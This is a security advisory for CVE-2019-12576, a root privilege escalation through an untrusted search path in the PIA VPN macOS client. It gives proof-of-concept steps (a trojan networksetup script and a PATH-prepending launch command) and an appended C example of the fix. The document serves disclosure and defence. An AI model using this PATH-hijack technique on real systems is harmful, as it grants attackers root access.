security-research/vulnerabilities/PIA/CVE-2019-12576.txt
Title: PIA macOS Privilege Escalation: Untrusted Search Path
Author: Rich Mirch
CVE: CVE-2019-12576
Vendor Advisory: N/A

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v82 for macOS could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.

The PIA macOS openvpn_launcher binary is setuid root. This program is called
during the connection process and executes several operating system utilities
to configure the system. The networksetup utility is called using a relative
path. A local unprivileged user can execute arbitrary commands as root by
creating a networksetup trojan which will be executed during the connection
process. This is possible because the PATH environment variable is not reset
prior to executing the OS utility.

CVSS

Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6

Test Environment

OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v82

Steps to reproduce

All steps are executed as a low-privileged user.

Step 1 - Create a script named networksetup with the following two lines. This
PoC sends the output of the id command to wall, which shows that it is
running with root privileges (uid=0).

#!/bin/sh
echo "$0: $(/usr/bin/id)"|/usr/bin/wall

Step 2 - Make the networksetup script executable.

chmod 755 networksetup

Step 3 - Execute run.sh to open the PIA GUI client while prepending the current
working directory ($PWD) to the PATH environment variable. This ensures that the
trojan networksetup script is found first because a relative path is used.

env "PATH=$PWD:$PATH" /Applications/Private\ Internet\ Access.app/Contents/MacOS/run.sh

Step 4 - Log in and connect to the VPN.

During the connection process networksetup will be executed as root and a
wall message will be broadcast showing the output of the id command with uid=0.

Timeline:

2018-12-18: Reported to vendor
2018-12-19: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83; however, this version was never released.
            The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure
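As an added example (not part of this advisory and not PIA's own code), the following C wrapper shows the fix the description implies for a setuid launcher: run OS utilities by absolute path through execve() with a fixed environment, so the caller's PATH is neither searched nor inherited. The SAFE_ENV PATH value, the run_sh helper and the constructed directory in main() are assumptions for the demonstration.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to every OS utility the launcher spawns. The
 * caller's PATH is ignored entirely, so prepending a directory to PATH before
 * starting the client cannot change which binary is executed. (Assumed value.) */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin:/usr/sbin:/sbin", NULL };

/* Run one OS utility from a setuid-root context.
 * Returns the child's exit status (0..255), or -1 if the call is refused or
 * fork/wait fails. The path must be absolute: a bare name like "networksetup"
 * handed to execvp()/system() is resolved through PATH, which is exactly the
 * untrusted search path the advisory describes. */
int run_utility_safely(const char *abs_path, char *const argv[]) {
    if (abs_path == NULL || abs_path[0] != '/') {
        errno = EINVAL;
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* execve() never searches PATH and passes SAFE_ENV to the child
         * instead of the inherited, caller-controlled environment. */
        execve(abs_path, argv, SAFE_ENV);
        _exit(127);  /* reached only if execve() itself failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

/* Self-check helper (hypothetical): run a shell command via /bin/sh, by
 * absolute path, through the same wrapper and return its exit status. */
int run_sh(const char *command) {
    char *const argv[] = { "sh", "-c", (char *)command, NULL };
    return run_utility_safely("/bin/sh", argv);
}

int main(void) {
    /* Reproduce the advisory's precondition with a constructed directory
     * prepended to PATH; the child must still see SAFE_ENV's PATH. */
    setenv("PATH", "/tmp/constructed-untrusted-dir:/usr/bin:/bin", 1);
    int rc = run_sh("test \"$PATH\" = /usr/bin:/bin:/usr/sbin:/sbin");
    printf("child saw the fixed PATH: %s\n", rc == 0 ? "yes" : "no");
    /* The real utility would be started the same way, e.g.
     * run_utility_safely("/usr/sbin/networksetup", argv) with its own argv. */
    return rc;
}
```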